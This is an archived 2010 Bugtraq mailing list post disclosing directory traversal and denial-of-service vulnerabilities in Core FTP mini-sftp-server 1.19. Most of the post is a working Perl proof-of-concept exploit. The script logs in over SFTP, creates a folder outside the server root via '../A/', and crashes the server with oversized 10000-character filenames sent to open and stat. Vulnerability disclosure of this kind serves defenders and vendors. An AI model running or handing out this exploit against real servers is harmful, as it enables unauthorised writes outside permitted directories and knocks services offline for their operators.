lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201006070835.o578Zlq5011319@www3.securityfocus.com>
Date: Mon, 7 Jun 2010 02:35:47 -0600
From: leinakesi@...il.com
To: bugtraq@...urityfocus.com
Subject: Core FTP mini-sftp-server Several DoS and Directory Traversal
 Vulnerabilities

Date of Discovery:
7-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor: 
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html

Affected:
Core FTP mini-sftp-server version 1.19. 
Earlier versions may also be affected.

Overview:
"Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It seems "Core FTP mini-core sftp server" has behaved the same way as Core FTP Server does--They have the same vulnerabilities.

1.	Directory Traversal vulnerability:
	$m = $sftp->mkdir("../A/");# create a folder outside the root directory

2.	Denial of Service vulnerability:
	$o1 = $sftp->open("A" x 10000);
	$o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
	$o3 = $sftp->open("test", $FUZZ, 0666);	$o3 = $sftp->open("test", $FUZZ, 0666);
	$st = $sftp->stat("A" x 10000);

PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^


Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#thanks to Jeremy Brown, I learned a lot from his blog.^_^
#the script will first make a folder "A" outside the root directory and then crash the server.

use Net::SSH2;
use Getopt::Std;


$FUZZ = "A" x 10000; 

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
	print "usage:\n\tperl	test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
	print "\tperl	test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
	exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

#make a folder outside the root directory
$m = $sftp->mkdir("../A/");

#any command of the following would cause Core FTP mini-sftp-server crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);

$ssh2->disconnect();

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ